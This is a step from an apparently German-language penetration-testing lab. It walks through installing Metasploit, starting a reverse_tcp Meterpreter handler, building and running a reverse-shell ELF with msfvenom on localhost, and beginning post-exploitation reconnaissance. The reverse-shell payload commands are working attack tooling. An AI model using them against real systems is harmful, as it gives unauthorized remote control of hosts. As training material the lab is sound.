Identifizieren eines Dienstes im internen Netzwerk eines Ziels
In diesem Schritt simulieren wir den Erhalt einer Meterpreter-Sitzung auf einem Zielsystem. In einem realen Szenario würde dies durch Ausnutzung einer Schwachstelle erreicht werden. Für dieses Lab richten wir einen Listener in Metasploit ein und führen manuell eine Payload aus, um uns damit zu verbinden. Dies ermöglicht es uns, uns auf die Post-Exploitation-Phase zu konzentrieren.
Zuerst müssen wir das Metasploit Framework installieren.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
Öffnen Sie als Nächstes ein Terminal und starten Sie die Metasploit-Konsole.
msfconsole -q
Innerhalb von msfconsole richten wir einen Handler ein, der auf eingehende Verbindungen wartet.
use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j
Öffnen Sie nun ein neues Terminal (Sie können dazu die "+" Schaltfläche im Terminal-Tab verwenden). In diesem neuen Terminal generieren und führen wir eine Payload aus, um uns mit unserem Listener zu verbinden.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf
./shell.elf
Wechseln Sie zurück zu Ihrem ersten Terminal mit msfconsole. Sie sollten eine Meldung sehen, die anzeigt, dass eine neue Sitzung geöffnet wurde. Interagieren wir damit.
sessions -l
sessions -i 1
Sie befinden sich nun in einer Meterpreter-Sitzung. Ein üblicher erster Schritt ist die Durchführung von Aufklärung (Reconnaissance). Lassen Sie uns die Netzwerkschnittstellen des "kompromittierten" Hosts überprüfen.
ifconfig
Sie werden mehrere Netzwerkschnittstellen sehen. Für dieses Lab gehen wir davon aus, dass wir durch weiteres Scannen (das über den Umfang dieses Labs hinausgeht) einen Webdienst auf 127.0.0.1 auf Port 8080 entdeckt haben. Unser Ziel ist es, auf diesen Dienst zuzugreifen.